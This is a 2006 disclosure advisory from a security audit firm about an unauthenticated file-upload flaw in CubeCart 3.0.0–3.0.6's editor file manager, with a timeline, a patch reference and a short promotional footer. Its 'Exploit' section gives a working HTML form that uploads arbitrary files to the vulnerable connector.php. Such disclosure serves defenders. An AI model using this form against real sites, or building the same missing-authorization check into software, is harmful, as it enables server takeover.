Advisory: NSAG-&#185;197-23.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: http://www.nsag.ru or http://www.nsag.org Product: CubeCart 3.0.0 ? 3.0.6 Site of manufacturer: http://www.cubecart.com The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is notified. 21/11/2005 - Answer of the manufacturer. 24/12/2005 - Patch. 29/12/2005 - New version CubeCart 3.0.7. 21/02/2006 - Publication of vulnerability. Original Advisory: http://www.nsag.ru/vuln/892.html Risk: Critical Description: Vulnerability exists because of insufficient check of authorization of the user in the script/includes/rte/editor/filemanager/browser/default/connectors/php/co nnector.php. Procedure of authorization include ("../includes/auth.inc.php" is not connected. The removed user can by means of specially generated URL to load any files on target system. Influence: Vulnerability allows the removed user loading of any files on system. Exploit: <form action="http://host/cubedir/admin/includes/rte/editor/filemanager/browse r/default/connectors/php/connector.php?Command=FileUpload&Type=File&Curr entFolder=/" method="POST" enctype="multipart/form-data"> File Upload<br> <input id="txtFileUpload" type="file" name="NewFile"> <br> <input type="submit" value="Upload"> </form> Decision: Download patch or update new version 3.0.7 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Our company is the independent auditor of the software in market IT. At present independent audit of the software becomes the standard practice and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors! www.nsag.ru ?Nemesis? &#169; 2006 ------------------------------------ Nemesis Security Audit Group &#169; 2006.